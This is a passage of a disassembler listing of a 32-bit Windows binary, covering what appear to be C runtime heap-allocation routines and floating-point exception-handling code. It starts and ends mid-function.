lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41BAB5
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41BAB5: ; CODE XREF: sub_41B877+214�j
; sub_41B877+21B�j ...
mov ebx, [ebp+arg_4]
loc_41BAB8: ; CODE XREF: sub_41B877+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41BADF
push 3Fh
pop esi
loc_41BADF: ; CODE XREF: sub_41B877+1DD�j
; sub_41B877+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41BB5C
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_41BB33
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41BB26
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41BB26: ; CODE XREF: sub_41B877+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_41BB58
; ---------------------------------------------------------------------------
loc_41BB33: ; CODE XREF: sub_41B877+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41BB49
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41BB49: ; CODE XREF: sub_41B877+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_41BB58: ; CODE XREF: sub_41B877+2BA�j
shr edx, cl
or [eax], edx
loc_41BB5C: ; CODE XREF: sub_41B877+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41BB65: ; CODE XREF: sub_41B877+1A2�j
; sub_41B877:loc_41BA25�j
push 1
pop eax
loc_41BB68: ; CODE XREF: sub_41B877+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B877 endp
; =============== S U B R O U T I N E =======================================
sub_41BB6D proc near ; CODE XREF: sub_41AFC9+41�p
; sub_41BE65:loc_41C034�p
cmp dword ptr unk_43DF60, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_41BB81
mov esi, offset off_43DF50
jmp short loc_41BB9E
; ---------------------------------------------------------------------------
loc_41BB81: ; CODE XREF: sub_41BB6D+B�j
push 2020h ; dwBytes
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapAlloc
mov esi, eax
test esi, esi
jz loc_41BCAA
loc_41BB9E: ; CODE XREF: sub_41BB6D+12�j
mov ebp, VirtualAlloc
push 4 ; flProtect
push 2000h ; flAllocationType
push offset __ImageBase ; dwSize
push 0 ; lpAddress
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_41BC93
push 4 ; flProtect
mov ebx, 10000h
push 1000h ; flAllocationType
push ebx ; dwSize
push edi ; lpAddress
call ebp ; VirtualAlloc
test eax, eax
jz loc_41BC85
mov eax, 43DF50h
cmp esi, eax
jnz short loc_41BBFD
cmp off_43DF50, 0
jnz short loc_41BBED
mov off_43DF50, eax
loc_41BBED: ; CODE XREF: sub_41BB6D+79�j
cmp lpMem, 0
jnz short loc_41BC12
mov lpMem, eax
jmp short loc_41BC12
; ---------------------------------------------------------------------------
loc_41BBFD: ; CODE XREF: sub_41BB6D+70�j
mov [esi], eax
mov eax, lpMem
mov [esi+4], eax
mov lpMem, esi
mov eax, [esi+4]
mov [eax], esi
loc_41BC12: ; CODE XREF: sub_41BB6D+87�j
; sub_41BB6D+8E�j
lea eax, __ImageBase[edi]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_41BC34: ; CODE XREF: sub_41BB6D+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_41BC34
push ebx
push 0
push edi
call sub_4179E0
add esp, 0Ch
loc_41BC5D: ; CODE XREF: sub_41BB6D+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_41BC81
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_41BC5D
; ---------------------------------------------------------------------------
loc_41BC81: ; CODE XREF: sub_41BB6D+F7�j
mov eax, esi
jmp short loc_41BCAC
; ---------------------------------------------------------------------------
loc_41BC85: ; CODE XREF: sub_41BB6D+63�j
push 8000h ; dwFreeType
push 0 ; dwSize
push edi ; lpAddress
call VirtualFree ; VirtualFree
loc_41BC93: ; CODE XREF: sub_41BB6D+4B�j
cmp esi, 43DF50h
jz short loc_41BCAA
push esi ; lpMem
push 0 ; dwFlags
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapFree
loc_41BCAA: ; CODE XREF: sub_41BB6D+2B�j
; sub_41BB6D+12C�j
xor eax, eax
loc_41BCAC: ; CODE XREF: sub_41BB6D+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41BB6D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41BCB1(LPVOID lpMem)
sub_41BCB1 proc near ; CODE XREF: sub_41BD07+A5�p
lpMem = dword ptr 4
push esi
mov esi, [esp+4+lpMem]
push 8000h ; dwFreeType
push 0 ; dwSize
push dword ptr [esi+10h] ; lpAddress
call VirtualFree ; VirtualFree
cmp dword ptr unk_43FF70, esi
jnz short loc_41BCD6
mov eax, [esi+4]
mov dword ptr unk_43FF70, eax
loc_41BCD6: ; CODE XREF: sub_41BCB1+1B�j
cmp esi, 43DF50h
jz short loc_41BCFE
mov eax, [esi+4]
mov ecx, [esi]
push esi ; lpMem
push 0 ; dwFlags
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push dword ptr byte_445EDC+0D5A44h ; hHeap
call HeapFree
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BCFE: ; CODE XREF: sub_41BCB1+2B�j
or dword ptr unk_43DF60, 0FFFFFFFFh
pop esi
retn
sub_41BCB1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BD07 proc near ; CODE XREF: sub_41BE20+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, lpMem
push edi
loc_41BD14: ; CODE XREF: sub_41BD07+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_41BDB2
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_41BD2D: ; CODE XREF: sub_41BD07+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_41BD6E
mov eax, ebx
push 4000h ; dwFreeType
add eax, [esi+10h]
push 1000h ; dwSize
push eax ; lpAddress
call VirtualFree ; VirtualFree
test eax, eax
jz short loc_41BD6E
or dword ptr [edi], 0FFFFFFFFh
dec dword ptr byte_445EDC+0D4444h
mov eax, [esi+0Ch]
test eax, eax
jz short loc_41BD63
cmp eax, edi
jbe short loc_41BD66
loc_41BD63: ; CODE XREF: sub_41BD07+56�j
mov [esi+0Ch], edi
loc_41BD66: ; CODE XREF: sub_41BD07+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_41BD7B
loc_41BD6E: ; CODE XREF: sub_41BD07+2C�j
; sub_41BD07+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_41BD2D
loc_41BD7B: ; CODE XREF: sub_41BD07+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_41BDB2
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_41BDB2
push 1
lea eax, [ecx+20h]
pop edx
loc_41BD92: ; CODE XREF: sub_41BD07+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41BDA3
inc edx
add eax, 8
cmp edx, 400h
jl short loc_41BD92
loc_41BDA3: ; CODE XREF: sub_41BD07+8E�j
cmp edx, 400h
jnz short loc_41BDB2
push ecx ; lpMem
call sub_41BCB1
pop ecx
loc_41BDB2: ; CODE XREF: sub_41BD07+11�j
; sub_41BD07+7D�j ...
cmp esi, lpMem
jz short loc_41BDC4
cmp [ebp+arg_0], 0
jg loc_41BD14
loc_41BDC4: ; CODE XREF: sub_41BD07+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BD07 endp
; =============== S U B R O U T I N E =======================================
sub_41BDC9 proc near ; CODE XREF: sub_418227+3A�p
; sub_419C9F+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, 43DF50h
push esi
mov ecx, edx
loc_41BDD5: ; CODE XREF: sub_41BDC9+1C�j
cmp eax, [ecx+10h]
jbe short loc_41BDDF
cmp eax, [ecx+14h]
jb short loc_41BDE7
loc_41BDDF: ; CODE XREF: sub_41BDC9+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_41BE1C
jmp short loc_41BDD5
; ---------------------------------------------------------------------------
loc_41BDE7: ; CODE XREF: sub_41BDC9+14�j
test al, 0Fh
jnz short loc_41BE1C
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_41BE1C
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_41BE1C: ; CODE XREF: sub_41BDC9+1A�j
; sub_41BDC9+20�j ...
xor eax, eax
pop esi
retn
sub_41BDC9 endp
; =============== S U B R O U T I N E =======================================
sub_41BE20 proc near ; CODE XREF: sub_418227+4D�p
; sub_419C9F+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_41BE64
inc dword ptr byte_445EDC+0D4444h
cmp dword ptr byte_445EDC+0D4444h, 20h
jnz short locret_41BE64
push 10h
call sub_41BD07
pop ecx
locret_41BE64: ; CODE XREF: sub_41BE20+2B�j
; sub_41BE20+3A�j
retn
sub_41BE20 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BE65 proc near ; CODE XREF: sub_4181B3+4A�p
; sub_419C9F+1AC�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, dword ptr unk_43FF70
push edi
loc_41BE73: ; CODE XREF: sub_41BE65+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_41BF1E
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_41BED8
loc_41BE9E: ; CODE XREF: sub_41BE65+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_41BEC1
cmp [edi+4], ebx
jbe short loc_41BEC1
push ebx
push ecx
push eax
call sub_41C06D
add esp, 0Ch
test eax, eax
jnz short loc_41BF30
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_41BEC1: ; CODE XREF: sub_41BE65+40�j
; sub_41BE65+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_41BE9E
jmp short loc_41BEDB
; ---------------------------------------------------------------------------
loc_41BED8: ; CODE XREF: sub_41BE65+37�j
mov ebx, [ebp+arg_0]
loc_41BEDB: ; CODE XREF: sub_41BE65+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_41BF21
loc_41BEEE: ; CODE XREF: sub_41BE65+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_41BF0D
cmp [edi+4], ebx
jbe short loc_41BF0D
push ebx
push eax
push [ebp+var_4]
call sub_41C06D
add esp, 0Ch
test eax, eax
jnz short loc_41BF30
mov [edi+4], ebx
loc_41BF0D: ; CODE XREF: sub_41BE65+8D�j
; sub_41BE65+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_41BEEE
jmp short loc_41BF21
; ---------------------------------------------------------------------------
loc_41BF1E: ; CODE XREF: sub_41BE65+14�j
mov ebx, [ebp+arg_0]
loc_41BF21: ; CODE XREF: sub_41BE65+87�j
; sub_41BE65+B7�j
mov esi, [esi]
cmp esi, dword ptr unk_43FF70
jz short loc_41BF40
jmp loc_41BE73
; ---------------------------------------------------------------------------
loc_41BF30: ; CODE XREF: sub_41BE65+54�j
; sub_41BE65+A3�j
mov dword ptr unk_43FF70, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_41C068
; ---------------------------------------------------------------------------
loc_41BF40: ; CODE XREF: sub_41BE65+C4�j
mov eax, 43DF50h
mov edi, eax
loc_41BF47: ; CODE XREF: sub_41BE65+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_41BF53
cmp dword ptr [edi+0Ch], 0
jnz short loc_41BF5F
loc_41BF53: ; CODE XREF: sub_41BE65+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_41C034
jmp short loc_41BF47
; ---------------------------------------------------------------------------
loc_41BF5F: ; CODE XREF: sub_41BE65+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_41BF8E
loc_41BF7D: ; CODE XREF: sub_41BE65+127�j
cmp [ebp+var_4], 10h
jge short loc_41BF8E
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41BF7D
loc_41BF8E: ; CODE XREF: sub_41BE65+116�j
; sub_41BE65+11C�j
mov eax, [ebp+var_4]
push 4 ; flProtect
shl eax, 0Ch
push 1000h ; flAllocationType
push eax ; dwSize
push esi ; lpAddress
mov [ebp+var_8], eax
call VirtualAlloc ; VirtualAlloc
cmp eax, esi
jnz loc_41C066
push 0
push [ebp+var_8]
push esi
call sub_4179E0
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_41BFF5
lea eax, [esi+4]
mov [ebp+var_4], edx
loc_41BFCB: ; CODE XREF: sub_41BE65+18E�j
or byte ptr [eax+0F4h], 0FFh
lea edx, [eax+4]
mov [eax-4], edx
mov edx, 0F0h
mov [eax], edx
mov [ecx], edx
mov dword ptr [ecx+4], 0F1h
add eax, 1000h
add ecx, 8
dec [ebp+var_4]
jnz short loc_41BFCB
loc_41BFF5: ; CODE XREF: sub_41BE65+15E�j
mov dword ptr unk_43FF70, edi
lea eax, [edi+2018h]
loc_41C001: ; CODE XREF: sub_41BE65+1A8�j
cmp ecx, eax
jnb short loc_41C011
cmp dword ptr [ecx], 0FFFFFFFFh
jz short loc_41C00F
add ecx, 8
jmp short loc_41C001
; ---------------------------------------------------------------------------
loc_41C00F: ; CODE XREF: sub_41BE65+1A3�j
cmp ecx, eax
loc_41C011: ; CODE XREF: sub_41BE65+19E�j
sbb eax, eax
and eax, ecx
mov [edi+0Ch], eax
mov eax, [ebp+arg_0]
mov [esi+8], al
mov [edi+8], ebx
sub [ebx], eax
sub [esi+4], eax
lea ecx, [esi+eax+8]
lea eax, [esi+100h]
mov [esi], ecx
jmp short loc_41C068
; ---------------------------------------------------------------------------
loc_41C034: ; CODE XREF: sub_41BE65+F2�j
call sub_41BB6D
test eax, eax
jz short loc_41C066
mov ecx, [eax+10h]
mov [ecx+8], bl
lea edx, [ecx+ebx+8]
mov dword ptr unk_43FF70, eax
mov [ecx], edx
mov edx, 0F0h
sub edx, ebx
mov [ecx+4], edx
movzx edx, bl
sub [eax+18h], edx
lea eax, [ecx+100h]
jmp short loc_41C068
; ---------------------------------------------------------------------------
loc_41C066: ; CODE XREF: sub_41BE65+143�j
; sub_41BE65+1D6�j
xor eax, eax
loc_41C068: ; CODE XREF: sub_41BE65+D6�j
; sub_41BE65+1CD�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41BE65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C06D proc near ; CODE XREF: sub_41BE65+4A�p
; sub_41BE65+99�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
mov edx, [ebp+arg_8]
push ebx
push esi
mov esi, [ecx+4]
push edi
mov edi, [ecx]
lea ebx, [ecx+0F8h]
cmp esi, edx
mov [ebp+var_4], edi
mov eax, edi
mov [ebp+arg_0], ebx
jb short loc_41C0B2
lea eax, [edi+edx]
mov [edi], dl
cmp eax, ebx
jnb short loc_41C0A1
add [ecx], edx
sub [ecx+4], edx
jmp short loc_41C0AA
; ---------------------------------------------------------------------------
loc_41C0A1: ; CODE XREF: sub_41C06D+2B�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41C0AA: ; CODE XREF: sub_41C06D+32�j
lea eax, [edi+8]
jmp loc_41C180
; ---------------------------------------------------------------------------
loc_41C0B2: ; CODE XREF: sub_41C06D+22�j
add esi, edi
cmp byte ptr [esi], 0
jz short loc_41C0BB
mov eax, esi
loc_41C0BB: ; CODE XREF: sub_41C06D+4A�j
lea esi, [eax+edx]
cmp esi, ebx
jnb short loc_41C105
loc_41C0C2: ; CODE XREF: sub_41C06D+96�j
mov bl, [eax]
test bl, bl
jnz short loc_41C0F8
push 1
lea ebx, [eax+1]
pop esi
loc_41C0CE: ; CODE XREF: sub_41C06D+68�j
cmp byte ptr [ebx], 0
jnz short loc_41C0D7
inc ebx
inc esi
jmp short loc_41C0CE
; ---------------------------------------------------------------------------
loc_41C0D7: ; CODE XREF: sub_41C06D+64�j
cmp esi, edx
jnb short loc_41C129
cmp eax, [ebp+var_4]
jnz short loc_41C0E5
mov [ecx+4], esi
jmp short loc_41C0F1
; ---------------------------------------------------------------------------
loc_41C0E5: ; CODE XREF: sub_41C06D+71�j
sub [ebp+arg_4], esi
cmp [ebp+arg_4], edx
jb loc_41C18A
loc_41C0F1: ; CODE XREF: sub_41C06D+76�j
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41C0FD
; ---------------------------------------------------------------------------
loc_41C0F8: ; CODE XREF: sub_41C06D+59�j
movzx esi, bl
add eax, esi
loc_41C0FD: ; CODE XREF: sub_41C06D+89�j
lea esi, [eax+edx]
cmp esi, [ebp+arg_0]
jb short loc_41C0C2
loc_41C105: ; CODE XREF: sub_41C06D+53�j
lea esi, [ecx+8]
loc_41C108: ; CODE XREF: sub_41C06D+EB�j
; sub_41C06D+F2�j
cmp esi, edi
jnb short loc_41C18A
lea eax, [esi+edx]
cmp eax, [ebp+arg_0]
jnb short loc_41C18A
mov al, [esi]
test al, al
jnz short loc_41C15A
push 1
lea ebx, [esi+1]
pop eax
loc_41C120: ; CODE XREF: sub_41C06D+BA�j
cmp byte ptr [ebx], 0
jnz short loc_41C14A
inc ebx
inc eax
jmp short loc_41C120
; ---------------------------------------------------------------------------
loc_41C129: ; CODE XREF: sub_41C06D+6C�j
lea ebx, [eax+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41C13A
sub esi, edx
mov [ecx], ebx
mov [ecx+4], esi
jmp short loc_41C143
; ---------------------------------------------------------------------------
loc_41C13A: ; CODE XREF: sub_41C06D+C2�j
and dword ptr [ecx+4], 0
lea esi, [ecx+8]
mov [ecx], esi
loc_41C143: ; CODE XREF: sub_41C06D+CB�j
mov [eax], dl
add eax, 8
jmp short loc_41C180
; ---------------------------------------------------------------------------
loc_41C14A: ; CODE XREF: sub_41C06D+B6�j
cmp eax, edx
jnb short loc_41C161
sub [ebp+arg_4], eax
cmp [ebp+arg_4], edx
jb short loc_41C18A
mov esi, ebx
jmp short loc_41C108
; ---------------------------------------------------------------------------
loc_41C15A: ; CODE XREF: sub_41C06D+AB�j
movzx eax, al
add esi, eax
jmp short loc_41C108
; ---------------------------------------------------------------------------
loc_41C161: ; CODE XREF: sub_41C06D+DF�j
lea ebx, [esi+edx]
cmp ebx, [ebp+arg_0]
jnb short loc_41C172
sub eax, edx
mov [ecx], ebx
mov [ecx+4], eax
jmp short loc_41C17B
; ---------------------------------------------------------------------------
loc_41C172: ; CODE XREF: sub_41C06D+FA�j
and dword ptr [ecx+4], 0
lea eax, [ecx+8]
mov [ecx], eax
loc_41C17B: ; CODE XREF: sub_41C06D+103�j
mov [esi], dl
lea eax, [esi+8]
loc_41C180: ; CODE XREF: sub_41C06D+40�j
; sub_41C06D+DB�j
imul ecx, 0Fh
shl eax, 4
sub eax, ecx
jmp short loc_41C18C
; ---------------------------------------------------------------------------
loc_41C18A: ; CODE XREF: sub_41C06D+7E�j
; sub_41C06D+9D�j ...
xor eax, eax
loc_41C18C: ; CODE XREF: sub_41C06D+11B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C06D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C191 proc near ; CODE XREF: sub_419C9F+19A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_8]
push ebx
mov ebx, [ebp+arg_4]
push esi
movzx ecx, byte ptr [edx]
push edi
mov edi, [ebp+arg_0]
and [ebp+var_4], 0
mov eax, ebx
sub eax, [edi+10h]
sar eax, 0Ch
cmp ecx, [ebp+arg_C]
lea edi, [edi+eax*8+18h]
jbe short loc_41C1CB
mov eax, [ebp+arg_C]
sub ecx, eax
mov [edx], al
add [edi], ecx
mov dword ptr [edi+4], 0F1h
jmp short loc_41C22B
; ---------------------------------------------------------------------------
loc_41C1CB: ; CODE XREF: sub_41C191+26�j
jnb short loc_41C232
mov eax, [ebp+arg_C]
lea esi, [edx+eax]
lea eax, [ebx+0F8h]
cmp eax, esi
jb short loc_41C232
lea eax, [ecx+edx]
loc_41C1E0: ; CODE XREF: sub_41C191+59�j
cmp eax, esi
jnb short loc_41C1EE
cmp byte ptr [eax], 0
jnz short loc_41C1EC
inc eax
jmp short loc_41C1E0
; ---------------------------------------------------------------------------
loc_41C1EC: ; CODE XREF: sub_41C191+56�j
cmp eax, esi
loc_41C1EE: ; CODE XREF: sub_41C191+51�j
jnz short loc_41C232
mov al, byte ptr [ebp+arg_C]
mov [edx], al
mov eax, [ebx]
cmp edx, eax
ja short loc_41C226
cmp esi, eax
jbe short loc_41C226
lea eax, [ebx+0F8h]
cmp esi, eax
jnb short loc_41C21D
xor eax, eax
mov [ebx], esi
cmp [esi], al
jnz short loc_41C218
loc_41C211: ; CODE XREF: sub_41C191+85�j
inc eax
cmp byte ptr [esi+eax], 0
jz short loc_41C211
loc_41C218: ; CODE XREF: sub_41C191+7E�j
mov [ebx+4], eax
jmp short loc_41C226
; ---------------------------------------------------------------------------
loc_41C21D: ; CODE XREF: sub_41C191+76�j
and dword ptr [ebx+4], 0
lea eax, [ebx+8]
mov [ebx], eax
loc_41C226: ; CODE XREF: sub_41C191+68�j
; sub_41C191+6C�j ...
sub ecx, [ebp+arg_C]
add [edi], ecx
loc_41C22B: ; CODE XREF: sub_41C191+38�j
mov [ebp+var_4], 1
loc_41C232: ; CODE XREF: sub_41C191:loc_41C1CB�j
; sub_41C191+4A�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_41C191 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __fastcall sub_41C23A(int, int, double, int)
sub_41C23A proc near ; CODE XREF: sub_418290+51�p
; sub_4183D7+51�p
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp dword ptr unk_4406C8, 0
jnz short loc_41C26F
push [ebp+arg_C] ; int
fld qword ptr [ebp+arg_4]
push ecx
push ecx ; double
fstp [esp+0Ch+var_C]
push ecx ; int
push ecx ; int
fldz
fstp [esp+14h+var_14]
fld qword ptr [ebp+arg_4]
push ecx ; int
push ecx ; int
fstp [esp+1Ch+var_1C]
push [ebp+arg_0] ; int
push 1 ; int
call sub_41C7EF
add esp, 24h
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C26F: ; CODE XREF: sub_41C23A+A�j
push 0FFFFh
mov dword ptr byte_445EDC+0D43E4h, 21h
push [ebp+arg_C]
call sub_41CA62
fld qword ptr [ebp+arg_4]
pop ecx
pop ecx
pop ebp
retn
sub_41C23A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C28D(DWORD dwExceptionCode, int, int, int, int, int, int)
sub_41C28D proc near ; CODE XREF: sub_418290:loc_418353�p
; sub_4183D7:loc_41849A�p
var_74 = qword ptr -74h
var_6C = qword ptr -6Ch
var_64 = qword ptr -64h
var_5C = dword ptr -5Ch
Arguments = dword ptr -58h
var_20 = dword ptr -20h
dwExceptionCode = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
push [ebp+arg_18]
lea eax, [ebp+arg_10]
push eax
push [ebp+dwExceptionCode]
call sub_41C5D8
add esp, 0Ch
test eax, eax
jnz short loc_41C2CB
lea eax, [ebp+arg_10]
and [ebp+var_20], 0FFFFFFFEh
push eax ; int
lea eax, [ebp+arg_8]
push eax ; int
lea eax, [ebp+arg_18]
push [ebp+arg_4] ; int
push [ebp+dwExceptionCode] ; dwExceptionCode
push eax ; int
lea eax, [ebp+Arguments]
push eax ; Arguments
call sub_41C325
add esp, 18h
loc_41C2CB: ; CODE XREF: sub_41C28D+1A�j
push [ebp+dwExceptionCode]
call sub_41C8C2
cmp dword ptr unk_4406C8, 0
pop ecx
jnz short loc_41C309
test eax, eax
jz short loc_41C309
push [ebp+arg_18] ; int
fld qword ptr [ebp+arg_10]
push ecx
push ecx ; double
fstp [esp+64h+var_64]
push ecx ; int
push ecx ; int
fldz
fstp [esp+6Ch+var_6C]
fld qword ptr [ebp+arg_8]
push ecx ; int
push ecx ; int
fstp [esp+74h+var_74]
push [ebp+arg_4] ; int
push eax ; int
call sub_41C7EF
add esp, 24h
leave
retn
; ---------------------------------------------------------------------------
loc_41C309: ; CODE XREF: sub_41C28D+4E�j
; sub_41C28D+52�j
push eax
call sub_41C877
mov [esp+5Ch+var_5C], 0FFFFh
push [ebp+arg_18]
call sub_41CA62
fld qword ptr [ebp+arg_10]
pop ecx
pop ecx
leave
retn
sub_41C28D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C325(ULONG_PTR Arguments, int, DWORD dwExceptionCode, int, int, int)
sub_41C325 proc near ; CODE XREF: sub_41C28D+36�p
Arguments = dword ptr 8
arg_4 = dword ptr 0Ch
dwExceptionCode = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
mov ecx, [ebp+Arguments]
xor eax, eax
push ebx
push esi
mov [ecx+4], eax
mov ecx, [ebp+Arguments]
push edi
push 1
mov [ecx+8], eax
mov ecx, [ebp+Arguments]
pop ebx
mov [ecx+0Ch], eax
mov cl, byte ptr [ebp+dwExceptionCode]
test cl, 10h
jz short loc_41C357
mov eax, [ebp+Arguments]
mov [ebp+dwExceptionCode], 0C000008Fh
or [eax+4], ebx
loc_41C357: ; CODE XREF: sub_41C325+23�j
test cl, 2
jz short loc_41C36A
mov eax, [ebp+Arguments]
mov [ebp+dwExceptionCode], 0C0000093h
or dword ptr [eax+4], 2
loc_41C36A: ; CODE XREF: sub_41C325+35�j
test cl, bl
jz short loc_41C37C
mov eax, [ebp+Arguments]
mov [ebp+dwExceptionCode], 0C0000091h
or dword ptr [eax+4], 4
loc_41C37C: ; CODE XREF: sub_41C325+47�j
test cl, 4
jz short loc_41C38F
mov eax, [ebp+Arguments]
mov [ebp+dwExceptionCode], 0C000008Eh
or dword ptr [eax+4], 8
loc_41C38F: ; CODE XREF: sub_41C325+5A�j
test cl, 8
jz short loc_41C3A2
mov eax, [ebp+Arguments]
mov [ebp+dwExceptionCode], 0C0000090h
